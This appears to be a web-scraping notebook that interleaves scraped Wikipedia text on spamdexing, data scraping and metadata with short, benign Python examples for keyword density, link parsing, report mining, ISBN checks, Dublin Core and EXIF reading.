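Keyword stuffing is described above in terms of keyword count, variety, and density. As a rough, hypothetical illustration (not any search engine's actual algorithm), an indexer-side check might compute term frequencies and flag pages where a single term dominates; the sample strings and the 0.3 threshold are invented for the example.

import re
from collections import Counter

def keyword_density(text, top_n=3):
    """Share of all words taken up by each of the top_n most frequent words."""
    words = re.findall(r"[a-z']+", text.lower())
    counts = Counter(words)
    total = len(words) or 1
    return [(w, c / total) for w, c in counts.most_common(top_n)]

stuffed = "cheap tickets cheap tickets buy cheap tickets cheap cheap tickets now"
normal = "we compare ticket prices from several airlines so you can plan your trip"

print(keyword_density(stuffed))   # 'cheap' and 'tickets' dominate
print(keyword_density(normal))    # no single word stands out

# A naive heuristic: flag the page if one word exceeds 30% of all words
print(any(share > 0.3 for _, share in keyword_density(stuffed, top_n=1)))   # True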
citation needed Unrelated hidden text is disguised by making it the same color as the background, using a tiny font size, or hiding it within HTML code such as "no frame" sections, alt attributes, zero-sized DIVs, and "no script" sections. People manually screening red-flagged websites for a search-engine company might temporarily or permanently block an entire website for having invisible text on some of its pages. However, hidden text is not always spamdexing: it can also be used to enhance accessibility. 8 This involves repeating keywords in the meta tags, and using meta keywords that are unrelated to the site's content. This tactic has been ineffective. Google declared that it doesn't use the keywords meta tag in its online search ranking in September 2009. 9 "Gateway" or doorway pages are low-quality web pages created with very little content, which are instead stuffed with very similar keywords and phrases. They are designed to rank highly within the search results, but serve no purpose to visitors looking for information. A doorway page will generally have "click here to enter" on the page; autoforwarding can also be used for this purpose. In 2006, Google ousted vehicle manufacturer BMW for using "doorway pages" to the company's German site, BMW.de. 10 Scraper sites are created using various programs designed to "scrape" search-engine results pages or other sources of content and create "content" for a website. citation needed The specific presentation of content on these sites is unique, but is merely an amalgamation of content taken from other sources, often without permission. Such websites are generally full of advertising (such as pay-per-click ads), or they redirect the user to other sites. It is even feasible for scraper sites to outrank original websites for their own information and organization names. Article spinning involves rewriting existing articles, as opposed to merely scraping content from other sites, to avoid penalties imposed by search engines for duplicate content. This process is undertaken by hired writers citation needed or automated using a thesaurus database or an artificial neural network. Similarly to article spinning, some sites use machine translation to render their content in several languages, with no human editing, resulting in unintelligible texts that nonetheless continue to be indexed by search engines, thereby attracting traffic. Link spam is defined as links between pages that are present for reasons other than merit. 11 Link spam takes advantage of link-based ranking algorithms, which gives websites higher rankings the more other highly ranked websites link to it. These techniques also aim at influencing other link-based ranking techniques such as the HITS algorithm. citation needed Link farms are tightly-knit networks of websites that link to each other for the sole purpose of exploiting the search engine ranking algorithms. These are also known facetiously as mutual admiration societies. 12 Use of links farms has greatly reduced with the launch of Google's first Panda Update in February 2011, which introduced significant improvements in its spam-detection algorithm. Blog networks (PBNs) are a group of authoritative websites used as a source of contextual links that point to the owner's main website to achieve higher search engine ranking. Owners of PBN websites use expired domains or auction domains that have backlinks from high-authority websites. 
Google targeted and penalized PBN users on several occasions with several massive deindexing campaigns since 2014. 13 Putting hyperlinks where visitors will not see them is used to increase link popularity. Highlighted link text can help rank a webpage higher for matching that phrase. A Sybil attack is the forging of multiple identities for malicious intent, named after the famous dissociative identity disorder patient and the book about her that shares her name, "Sybil". 14 15 A spammer may create multiple web sites at different domain names that all link to each other, such as fake blogs (known as spam blogs). Spam blogs are blogs created solely for commercial promotion and the passage of link authority to target sites. Often these "splogs" are designed in a misleading manner that will give the effect of a legitimate website but upon close inspection will often be written using spinning software or be very poorly written with barely readable content. They are similar in nature to link farms. 16 17 Guest blog spam is the process of placing guest blogs on websites for the sole purpose of gaining a link to another website or websites. Unfortunately, these are often confused with legitimate forms of guest blogging with other motives than placing links. This technique was made famous by Matt Cutts, who publicly declared "war" against this form of link spam. 18 Some link spammers utilize expired domain crawler software or monitor DNS records for domains that will expire soon, then buy them when they expire and replace the pages with links to their pages. However, it is possible but not confirmed that Google resets the link data on expired domains. citation needed To maintain all previous Google ranking data for the domain, it is advisable that a buyer grab the domain before it is "dropped". Some of these techniques may be applied for creating a Google bomb—that is, to cooperate with other users to boost the ranking of a particular page for a particular query. Web sites that can be edited by users can be used by spamdexers to insert links to spam sites if the appropriate anti-spam measures are not taken. Automated spambots can rapidly make the user-editable portion of a site unusable. Programmers have developed a variety of automated spam prevention techniques to block or at least slow down spambots. Spam in blogs is the placing or solicitation of links randomly on other sites, placing a desired keyword into the hyperlinked text of the inbound link. Guest books, forums, blogs, and any site that accepts visitors' comments are particular targets and are often victims of drive-by spamming where automated software creates nonsense posts with links that are usually irrelevant and unwanted. Comment spam is a form of link spam that has arisen in web pages that allow dynamic user editing such as wikis, blogs, and guestbooks. It can be problematic because agents can be written that automatically randomly select a user edited web page, such as a Wikipedia article, and add spamming links. 19 Wiki spam is when a spammer uses the open editability of wiki systems to place links from the wiki site to the spam site. Referrer spam takes place when a spam perpetrator or facilitator accesses a web page (the referee), by following a link from another web page (the referrer), so that the referee is given the address of the referrer by the person's Internet browser. Some websites have a referrer log which shows which pages link to that site. 
By having a robot randomly access many sites enough times, with a message or specific address given as the referrer, that message or Internet address then appears in the referrer log of those sites that have referrer logs. Since some Web search engines base the importance of sites on the number of different sites linking to them, referrer-log spam may increase the search engine rankings of the spammer's sites. Also, site administrators who notice the referrer log entries in their logs may follow the link back to the spammer's referrer page. Because of the large amount of spam posted to user-editable webpages, Google proposed a "nofollow" tag that could be embedded with links. A link-based search engine, such as Google's PageRank system, will not use the link to increase the score of the linked website if the link carries a nofollow tag. This ensures that spamming links to user-editable websites will not raise the sites ranking with search engines. Nofollow is used by several major websites, including Wordpress, Blogger and Wikipedia. citation needed A mirror site is the hosting of multiple websites with conceptually similar content but using different URLs. Some search engines give a higher rank to results where the keyword searched for appears in the URL. URL redirection is the taking of the user to another page without his or her intervention, e.g., using META refresh tags, Flash, JavaScript, Java or Server side redirects. However, 301 Redirect, or permanent redirect, is not considered as a malicious behavior. Cloaking refers to any of several means to serve a page to the search-engine spider that is different from that seen by human users. It can be an attempt to mislead search engines regarding the content on a particular web site. Cloaking, however, can also be used to ethically increase accessibility of a site to users with disabilities or provide human users with content that search engines aren't able to process or parse. It is also used to deliver content based on a user's location; Google itself uses IP delivery, a form of cloaking, to deliver results. Another form of cloaking is code swapping, i.e., optimizing a page for top ranking and then swapping another page in its place once a top ranking is achieved. Google refers to these type of redirects as Sneaky Redirects. 20 Spamdexed pages are sometimes eliminated from search results by the search engine. Users can employ search operators for filtering. For Google, a keyword preceded by (minus) will omit sites that contains the keyword in their pages or in the URL of the pages from search result. As an example, the search unwanted site will eliminate sites that contains word unwanted site in their pages and the pages whose URL contains unwanted site . Users could also use the Google Chrome extension "Personal Blocklist (by Google) , launched by Google in 2011 as part of countermeasures against content farming. 21 Via the extension, users could block a specific page, or set of pages from appearing in their search results. As of 2021, the original extension appears to be removed, although similar-functioning extensions may be used. Possible solutions to overcome search-redirection poisoning redirecting to illegal internet pharmacies include notification of operators of vulnerable legitimate domains. 
Further, manual evaluation of SERPs, previously published link-based and content-based algorithms, and tailor-made automatic detection and classification engines can be used as benchmarks in the effective identification of pharma scam campaigns. 22 |
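Tying the nofollow mechanism described earlier in this article back to the scraping tools used in this document, the hypothetical sketch below shows what the rel="nofollow" convention looks like in markup and how a link-counting crawler could skip such links; the HTML snippet and URLs are made up for illustration.

from bs4 import BeautifulSoup

html = """
<p>Great post!
  <a href="https://example.com/spam-site" rel="nofollow">my site</a>
  <a href="https://example.com/cited-source">a cited source</a>
</p>
"""

soup = BeautifulSoup(html, "html.parser")

for link in soup.find_all("a"):
    rels = link.get("rel") or []          # BeautifulSoup returns rel as a list
    counted = "nofollow" not in rels
    print(link["href"], "-> counted for ranking:", counted)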
568 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Description | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
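Listening to JSON feeds, mentioned above as a newer form of web scraping, can be sketched with the requests library already imported earlier in this document; the endpoint URL and field names below are placeholders, not a real API.

import requests

def fetch_json_feed(url, timeout=10):
    """Fetch a JSON endpoint and return the parsed payload (hypothetical endpoint)."""
    response = requests.get(url, headers={"Accept": "application/json"}, timeout=timeout)
    response.raise_for_status()
    return response.json()

# Placeholder URL and keys, for illustration only:
# data = fetch_json_feed("https://example.com/api/products?page=1")
# rows = [(item["name"], item["price"]) for item in data["results"]]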
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
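Report mining, as described above, works from static human-readable files rather than a live system. With the pandas and StringIO imports used earlier in this document, a spooled HTML report could be mined along these lines; the report content is invented for illustration.

import pandas as pd
from io import StringIO

# Stand-in for an HTML report saved from a legacy system's print/spool output
report_html = """
<table>
  <tr><th>Invoice</th><th>Customer</th><th>Amount</th></tr>
  <tr><td>1001</td><td>Acme Ltd</td><td>250.00</td></tr>
  <tr><td>1002</td><td>Globex</td><td>975.50</td></tr>
</table>
"""

tables = pd.read_html(StringIO(report_html))   # parses every <table> into a DataFrame
report = tables[0]
print(report)
print("Total billed:", report["Amount"].sum())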
569 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Metadata | Metadata (or metainformation) is "data that provides information about other data", 1 but not the content of the data itself, such as the text of a message or the image itself. 2 There are many distinct types of metadata, including: Metadata is not strictly bound to one of these categories, as it can describe a piece of data in many other ways. Metadata has various purposes. It can help users find relevant information and discover resources. It can also help organize electronic resources, provide digital identification, and archive and preserve resources. Metadata allows users to access resources by "allowing resources to be found by relevant criteria, identifying resources, bringing similar resources together, distinguishing dissimilar resources, and giving location information". 8 Metadata of telecommunication activities including Internet traffic is very widely collected by various national governmental organizations. This data is used for the purposes of traffic analysis and can be used for mass surveillance. 9 Metadata was traditionally used in the card catalogs of libraries until the 1980s when libraries converted their catalog data to digital databases. 10 In the 2000s, as data and information were increasingly stored digitally, this digital data was described using metadata standards. 11 The first description of "meta data" for computer systems is purportedly noted by MIT's Center for International Studies experts David Griffel and Stuart McIntosh in 1967: "In summary then, we have statements in an object language about subject descriptions of data and token codes for the data. We also have statements in a meta language describing the data relationships and transformations, and ought is relations between norm and data. 12 Unique metadata standards exist for different disciplines (e.g., museum collections, digital audio files, websites, etc.). Describing the contents and context of data or data files increases its usefulness. For example, a web page may include metadata specifying what software language the page is written in (e.g., HTML), what tools were used to create it, what subjects the page is about, and where to find more information about the subject. This metadata can automatically improve the reader's experience and make it easier for users to find the web page online. 13 A CD may include metadata providing information about the musicians, singers, and songwriters whose work appears on the disc. In many countries, government organizations routinely store metadata about emails, telephone calls, web pages, video traffic, IP connections, and cell phone locations. citation needed Metadata means "data about data". Metadata is defined as the data providing information about one or more aspects of the data; it is used to summarize basic information about data that can make tracking and working with specific data easier. 14 Some examples include: For example, a digital image may include metadata that describes the size of the image, its color depth, resolution, when it was created, the shutter speed, and other data. 15 A text document's metadata may contain information about how long the document is, who the author is, when the document was written, and a short summary of the document. Metadata within web pages can also contain descriptions of page content, as well as key words linked to the content. 
16 These links are often called "Metatags", which were used as the primary factor in determining order for a web search until the late 1990s. 16 The reliance on metatags in web searches was decreased in the late 1990s because of "keyword stuffing", 16 whereby metatags were being largely misused to trick search engines into thinking some websites had more relevance in the search than they really did. 16 Metadata can be stored and managed in a database, often called a metadata registry or metadata repository. 17 However, without context and a point of reference, it might be impossible to identify metadata just by looking at it. 18 For example: by itself, a database containing several numbers, all 13 digits long could be the results of calculations or a list of numbers to plug into an equation without any other context, the numbers themselves can be perceived as the data. But if given the context that this database is a log of a book collection, those 13 digit numbers may now be identified as ISBNs information that refers to the book, but is not itself the information within the book. The term "metadata" was coined in 1968 by Philip Bagley, in his book "Extension of Programming Language Concepts" where it is clear that he uses the term in the ISO 11179 "traditional" sense, which is "structural metadata" i.e. "data about the containers of data"; rather than the alternative sense "content about individual instances of data content" or metacontent, the type of data usually found in library catalogs. 19 20 Since then the fields of information management, information science, information technology, librarianship, and GIS have widely adopted the term. In these fields, the word metadata is defined as "data about data". 21 While this is the generally accepted definition, various disciplines have adopted their own more specific explanations and uses of the term. Slate reported in 2013 that the United States government's interpretation of "metadata" could be broad, and might include message content such as the subject lines of emails. 22 While the metadata application is manifold, covering a large variety of fields, there are specialized and well-accepted models to specify types of metadata. Bretherton Singley (1994) distinguish between two distinct classes: structural control metadata and guide metadata. 23 Structural metadata describes the structure of database objects such as tables, columns, keys and indexes. Guide metadata helps humans find specific items and is usually expressed as a set of keywords in a natural language. According to Ralph Kimball, metadata can be divided into three categories: technical metadata (or internal metadata), business metadata (or external metadata), and process metadata. NISO distinguishes three types of metadata: descriptive, structural, and administrative. 21 Descriptive metadata is typically used for discovery and identification, as information to search and locate an object, such as title, authors, subjects, keywords, and publisher. Structural metadata describes how the components of an object are organized. An example of structural metadata would be how pages are ordered to form chapters of a book. Finally, administrative metadata gives information to help manage the source. Administrative metadata refers to the technical information, such as file type, or when and how the file was created. Two sub-types of administrative metadata are rights management metadata and preservation metadata. 
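The 13-digit/ISBN example above maps nicely onto this notebook's regex theme: without context a 13-digit string is just a number, but with context you can at least test whether it is a plausible ISBN-13. A minimal sketch follows; the sample values are illustrative (the first is a commonly cited valid ISBN-13).

# Context turns a bare 13-digit number into an ISBN-13: check the prefix and the
# check digit.
import re

def looks_like_isbn13(candidate):
    digits = re.sub(r"\D", "", candidate)
    if len(digits) != 13 or not digits.startswith(("978", "979")):
        return False
    # ISBN-13 check digit: weights alternate 1 and 3 over the first 12 digits
    total = sum(int(d) * (1 if i % 2 == 0 else 3) for i, d in enumerate(digits[:12]))
    return (10 - total % 10) % 10 == int(digits[12])

print(looks_like_isbn13("978-0-306-40615-7"))   # True
print(looks_like_isbn13("1234567890123"))       # False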
Rights management metadata explains intellectual property rights, while preservation metadata contains information to preserve and save a resource. 8 Statistical data repositories have their own requirements for metadata in order to describe not only the source and quality of the data 6 but also what statistical processes were used to create the data, which is of particular importance to the statistical community in order to both validate and improve the process of statistical data production. 7 An additional type of metadata beginning to be more developed is accessibility metadata. Accessibility metadata is not a new concept to libraries; however, advances in universal design have raised its profile. 24 : 213 214 Projects like Cloud4All and GPII identified the lack of common terminologies and models to describe the needs and preferences of users and information that fits those needs as a major gap in providing universal access solutions. 24 : 210 211 Those types of information are accessibility metadata. 24 : 214 Schema.org has incorporated several accessibility properties based on IMS Global Access for All Information Model Data Element Specification. 24 : 214 The Wiki page WebSchemas Accessibility lists several properties and their values. While the efforts to describe and standardize the varied accessibility needs of information seekers are beginning to become more robust, their adoption into established metadata schemas has not been as developed. For example, while Dublin Core (DC)'s "audience" and MARC 21's "reading level" could be used to identify resources suitable for users with dyslexia and DC's "format" could be used to identify resources available in braille, audio, or large print formats, there is more work to be done. 24 : 214 Metadata (metacontent) or, more correctly, the vocabularies used to assemble metadata (metacontent) statements, is typically structured according to a standardized concept using a well-defined metadata scheme, including metadata standards and metadata models. Tools such as controlled vocabularies, taxonomies, thesauri, data dictionaries, and metadata registries can be used to apply further standardization to the metadata. Structural metadata commonality is also of paramount importance in data model development and in database design. Metadata (metacontent) syntax refers to the rules created to structure the fields or elements of metadata (metacontent). 25 A single metadata scheme may be expressed in a number of different markup or programming languages, each of which requires a different syntax. For example, Dublin Core may be expressed in plain text, HTML, XML, and RDF. 26 A common example of (guide) metacontent is the bibliographic classification, the subject, the Dewey Decimal class number. There is always an implied statement in any "classification" of some object. To classify an object as, for example, Dewey class number 514 (Topology) (i.e. books having the number 514 on their spine) the implied statement is: book subject heading 514 . This is a subject-predicate-object triple, or more importantly, a class-attribute-value triple. The first 2 elements of the triple (class, attribute) are pieces of some structural metadata having a defined semantic. The third element is a value, preferably from some controlled vocabulary, some reference (master) data. The combination of the metadata and master data elements results in a statement which is a metacontent statement i.e. "metacontent metadata master data". 
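Since Dublin Core can be expressed in several syntaxes (plain text, HTML, XML, RDF), here is a minimal sketch of one of them: an XML record built with the standard library. The wrapper element name and sample values are assumptions; only the dc: namespace URI is standard.

# Minimal sketch of a Dublin Core record expressed in XML.
import xml.etree.ElementTree as ET

DC_NS = "http://purl.org/dc/elements/1.1/"
ET.register_namespace("dc", DC_NS)

record = ET.Element("record")                      # wrapper name is an assumption
for element, value in [("title", "Touching the Void"),
                       ("creator", "Joe Simpson"),
                       ("subject", "Mountaineering")]:
    child = ET.SubElement(record, f"{{{DC_NS}}}{element}")
    child.text = value

print(ET.tostring(record, encoding="unicode"))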
All of these elements can be thought of as "vocabulary". Both metadata and master data are vocabularies that can be assembled into metacontent statements. There are many sources of these vocabularies, both meta and master data: UML, EDIFACT, XSD, Dewey UDC LoC, SKOS, ISO 25964, Pantone, Linnaean Binomial Nomenclature, etc. Using controlled vocabularies for the components of metacontent statements, whether for indexing or finding, is endorsed by ISO 25964: "If both the indexer and the searcher are guided to choose the same term for the same concept, then relevant documents will be retrieved. 27 This is particularly relevant when considering search engines of the internet, such as Google. The process indexes pages and then matches text strings using its complex algorithm; there is no intelligence or "inferencing" occurring, just the illusion thereof. Metadata schemata can be hierarchical in nature where relationships exist between metadata elements and elements are nested so that parent-child relationships exist between the elements. An example of a hierarchical metadata schema is the IEEE LOM schema, in which metadata elements may belong to a parent metadata element. Metadata schemata can also be one-dimensional, or linear, where each element is completely discrete from other elements and classified according to one dimension only. An example of a linear metadata schema is the Dublin Core schema, which is one-dimensional. Metadata schemata are often 2 dimensional, or planar, where each element is completely discrete from other elements but classified according to 2 orthogonal dimensions. 28 The degree to which the data or metadata is structured is referred to as "granularity". "Granularity" refers to how much detail is provided. Metadata with a high granularity allows for deeper, more detailed, and more structured information and enables a greater level of technical manipulation. A lower level of granularity means that metadata can be created for considerably lower costs but will not provide as detailed information. The major impact of granularity is not only on creation and capture, but moreover on maintenance costs. As soon as the metadata structures become outdated, so too is the access to the referred data. Hence granularity must take into account the effort to create the metadata as well as the effort to maintain it. In all cases where the metadata schemata exceed the planar depiction, some type of hypermapping is required to enable display and view of metadata according to chosen aspect and to serve special views. Hypermapping frequently applies to layering of geographical and geological information overlays. 29 International standards apply to metadata. Much work is being accomplished in the national and international standards communities, especially ANSI (American National Standards Institute) and ISO (International Organization for Standardization) to reach a consensus on standardizing metadata and registries. The core metadata registry standard is ISO IEC 11179 Metadata Registries (MDR), the framework for the standard is described in ISO IEC 11179 1:2004. 30 A new edition of Part 1 is in its final stage for publication in 2015 or early 2016. It has been revised to align with the current edition of Part 3, ISO IEC 11179 3:2013 31 which extends the MDR to support the registration of Concept Systems. (see ISO IEC 11179). This standard specifies a schema for recording both the meaning and technical structure of the data for unambiguous usage by humans and computers. 
ISO IEC 11179 standard refers to metadata as information objects about data, or "data about data". In ISO IEC 11179 Part 3, the information objects are data about Data Elements, Value Domains, and other reusable semantic and representational information objects that describe the meaning and technical details of a data item. This standard also prescribes the details for a metadata registry, and for registering and administering the information objects within a Metadata Registry. ISO IEC 11179 Part 3 also has provisions for describing compound structures that are derivations of other data elements, for example through calculations, collections of one or more data elements, or other forms of derived data. While this standard describes itself originally as a "data element" registry, its purpose is to support describing and registering metadata content independently of any particular application, lending the descriptions to being discovered and reused by humans or computers in developing new applications, databases, or for analysis of data collected in accordance with the registered metadata content. This standard has become the general basis for other kinds of metadata registries, reusing and extending the registration and administration portion of the standard. The Geospatial community has a tradition of specialized geospatial metadata standards, particularly building on traditions of map- and image-libraries and catalogs. Formal metadata is usually essential for geospatial data, as common text-processing approaches are not applicable. The Dublin Core metadata terms are a set of vocabulary terms that can be used to describe resources for the purposes of discovery. The original set of 15 classic 32 metadata terms, known as the Dublin Core Metadata Element Set 33 are endorsed in the following standards documents: The W3C Data Catalog Vocabulary (DCAT) 37 is an RDF vocabulary that supplements Dublin Core with classes for Dataset, Data Service, Catalog, and Catalog Record. DCAT also uses elements from FOAF, PROV-O, and OWL-Time. DCAT provides an RDF model to support the typical structure of a catalog that contains records, each describing a dataset or service. Although not a standard, Microformat (also mentioned in the section metadata on the internet below) is a web-based approach to semantic markup which seeks to re-use existing HTML XHTML tags to convey metadata. Microformat follows XHTML and HTML standards but is not a standard in itself. One advocate of microformats, Tantek elik, characterized a problem with alternative approaches: Here's a new language we want you to learn, and now you need to output these additional files on your server. It's a hassle. (Microformats) lower the barrier to entry. 38 Metadata may be written into a digital photo file that will identify who owns it, copyright and contact information, what brand or model of camera created the file, along with exposure information (shutter speed, f-stop, etc.) and descriptive information, such as keywords about the photo, making the file or image searchable on a computer and or the Internet. Some metadata is created by the camera such as, color space, color channels, exposure time, and aperture (EXIF), while some is input by the photographer and or software after downloading to a computer. 
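A hedged sketch of reading the camera-written (EXIF) metadata mentioned above; this assumes the Pillow package is installed (pip install Pillow) and uses a made-up file name.

# Read EXIF tags from a photo and map numeric tag IDs to readable names.
from PIL import Image, ExifTags

def read_exif(path):
    with Image.open(path) as img:
        exif = img.getexif()                     # raw tag-id -> value mapping
        return {ExifTags.TAGS.get(tag_id, tag_id): value
                for tag_id, value in exif.items()}

# Example (assumed file name):
# print(read_exif("photo.jpg"))   # may include Model, DateTime, orientation, ...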
39 Most digital cameras write metadata about the model number, shutter speed, etc., and some enable you to edit it; 40 this functionality has been available on most Nikon DSLRs since the Nikon D3, on most new Canon cameras since the Canon EOS 7D, and on most Pentax DSLRs since the Pentax K 3. Metadata can be used to make organizing in post-production easier with the use of key-wording. Filters can be used to analyze a specific set of photographs and create selections on criteria like rating or capture time. On devices with geolocation capabilities like GPS (smartphones in particular), the location the photo was taken from may also be included. Photographic Metadata Standards are governed by organizations that develop the following standards. They include, but are not limited to: Information on the times, origins and destinations of phone calls, electronic messages, instant messages, and other modes of telecommunication, as opposed to message content, is another form of metadata. Bulk collection of this call detail record metadata by intelligence agencies has proven controversial after disclosures by Edward Snowden of the fact that certain Intelligence agencies such as the NSA had been (and perhaps still are) keeping online metadata on millions of internet users for up to a year, regardless of whether or not they ever were persons of interest to the agency. Metadata is particularly useful in video, where information about its contents (such as transcripts of conversations and text descriptions of its scenes) is not directly understandable by a computer, but where an efficient search of the content is desirable. This is particularly useful in video applications such as Automatic Number Plate Recognition and Vehicle Recognition Identification software, wherein license plate data is saved and used to create reports and alerts. 42 There are 2 sources in which video metadata is derived: (1) operational gathered metadata, that is information about the content produced, such as the type of equipment, software, date, and location; (2) human-authored metadata, to improve search engine visibility, discoverability, audience engagement, and providing advertising opportunities to video publishers. 43 Avid's MetaSync and Adobe's Bridge are examples of professional video editing software with access to metadata. 44 Geospatial metadata relates to Geographic Information Systems (GIS) files, maps, images, and other data that is location-based. Metadata is used in GIS to document the characteristics and attributes of geographic data, such as database files and data that is developed within a GIS. It includes details like who developed the data, when it was collected, how it was processed, and what formats it's available in, and then delivers the context for the data to be used effectively. 45 Metadata can be created either by automated information processing or by manual work. Elementary metadata captured by computers can include information about when an object was created, who created it, when it was last updated, file size, and file extension. In this context an object refers to any of the following: A metadata engine collects, stores and analyzes information about data and metadata in use within a domain. 46 Data virtualization emerged in the 2000s as the new software technology to complete the virtualization "stack" in the enterprise. Metadata is used in data virtualization servers which are enterprise infrastructure components, alongside database and application servers. 
Metadata in these servers is saved as persistent repository and describe business objects in various enterprise systems and applications. Structural metadata commonality is also important to support data virtualization. Standardization and harmonization work has brought advantages to industry efforts to build metadata systems in the statistical community. 47 48 Several metadata guidelines and standards such as the European Statistics Code of Practice 49 and ISO 17369:2013 (Statistical Data and Metadata Exchange or SDMX) 47 provide key principles for how businesses, government bodies, and other entities should manage statistical data and metadata. Entities such as Eurostat, 50 European System of Central Banks, 50 and the U.S. Environmental Protection Agency 51 have implemented these and other such standards and guidelines with the goal of improving "efficiency when managing statistical business processes". 50 Metadata has been used in various ways as a means of cataloging items in libraries in both digital and analog formats. Such data helps classify, aggregate, identify, and locate a particular book, DVD, magazine, or any object a library might hold in its collection. 52 Until the 1980s, many library catalogs used 3x5 inch cards in file drawers to display a book's title, author, subject matter, and an abbreviated alpha-numeric string (call number) which indicated the physical location of the book within the library's shelves. The Dewey Decimal System employed by libraries for the classification of library materials by subject is an early example of metadata usage. The early paper catalog had information regarding whichever item was described on said card: title, author, subject, and a number as to where to find said item. 53 Beginning in the 1980s and 1990s, many libraries replaced these paper file cards with computer databases. These computer databases make it much easier and faster for users to do keyword searches. Another form of older metadata collection is the use by the US Census Bureau of what is known as the "Long Form". The Long Form asks questions that are used to create demographic data to find patterns of distribution. 54 Libraries employ metadata in library catalogues, most commonly as part of an Integrated Library Management System. Metadata is obtained by cataloging resources such as books, periodicals, DVDs, web pages or digital images. This data is stored in the integrated library management system, ILMS, using the MARC metadata standard. The purpose is to direct patrons to the physical or electronic location of items or areas they seek as well as to provide a description of the item s in question. More recent and specialized instances of library metadata include the establishment of digital libraries including e-print repositories and digital image libraries. While often based on library principles, the focus on non-librarian use, especially in providing metadata, means they do not follow traditional or common cataloging approaches. Given the custom nature of included materials, metadata fields are often specially created e.g. taxonomic classification fields, location fields, keywords, or copyright statement. Standard file information such as file size and format are usually automatically included. 55 Library operation has for decades been a key topic in efforts toward international standardization. Standards for metadata in digital libraries include Dublin Core, METS, MODS, DDI, DOI, URN, PREMIS schema, EML, and OAI-PMH. 
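Many of the digital-library standards listed above are exposed over OAI-PMH. A hedged sketch of harvesting Dublin Core records with requests follows; the endpoint URL is a placeholder, not a real repository, so swap in an actual OAI-PMH base URL before running.

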